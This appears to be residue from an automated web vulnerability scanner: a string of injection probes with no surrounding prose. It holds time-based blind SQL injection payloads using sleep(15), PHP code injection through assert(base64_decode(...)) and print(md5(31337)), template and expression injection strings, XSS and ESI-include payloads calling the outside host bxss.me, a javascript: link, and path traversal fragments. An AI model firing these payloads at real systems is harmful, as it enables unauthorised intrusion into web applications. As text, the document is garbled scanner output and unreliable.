"o") <th:t="${dfb}#foreach if(now()=sysdate() ../pHqghUme <a HrEF=http://xss.bxss.me></a> sleep(15) http://bxss.me/t/fit.txt?.jpg '" <a HrEF=jaVaScRiPT:> 0) pHqghUme<esi:include src="http://bxss.me/rpb.png"/> ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%> xfs.bxss.me 0'XOR(if(now()=sysdate() ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); <!-- 0))XOR'Z ';print(md5(31337));$a=' '"() 0"XOR(if(now()=sysdate() 15)||' ";print(md5(31337));$a=" ${@print(md5(31337))} 0))XOR"Z 1'" Http://bxss.me/t/fit.txt ${@print(md5(31337))}\ (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ 1 ˤˢ%2527%2522